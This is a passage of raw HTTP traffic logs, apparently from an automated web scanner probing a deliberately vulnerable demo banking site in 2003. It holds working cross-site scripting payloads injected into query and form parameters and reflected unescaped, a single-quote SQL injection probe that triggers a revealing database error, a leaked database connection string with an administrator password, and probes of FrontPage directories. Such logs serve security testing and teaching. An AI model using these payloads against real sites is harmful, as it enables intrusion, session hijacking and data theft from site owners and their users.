<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /plink.asp?a=b&c=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 204
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"'><img src="javascript:alert('XSS')"></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=</textarea><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4014
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="</textarea><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=\'&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:25 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 359
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e14'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'user = '\'''.</font>
<p>
<font face="Arial" size=2>/login1.asp</font><font face="Arial" size=2>, line 10</font> POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 148
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:56 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 127
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data 1"style="background:url(javascript:alert('XSS'))" "<br>Please try again.
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=>"><script>alert("XSS")</script>&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 381
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = >"><script>alert("XSS")</script></P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 146
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=1"style="background:url(javascript:alert('XSS'))"%20"&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 367
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = 1"style="background:url(javascript:alert('XSS'))" "</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=1"style="background:url(javascript:alert('XSS'))"%20"&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /_vti_cnf/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:42 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /linking/link1/link2/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:27 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /_vti_txt/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_txt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/index.htm HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:24:25 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:11 GMT
ETag: "5293b5fea9dc11:8f6"
Content-Length: 39
<A HREF="./link13/index.htm">Link13</A>GET /_vti_log/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:49:05 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
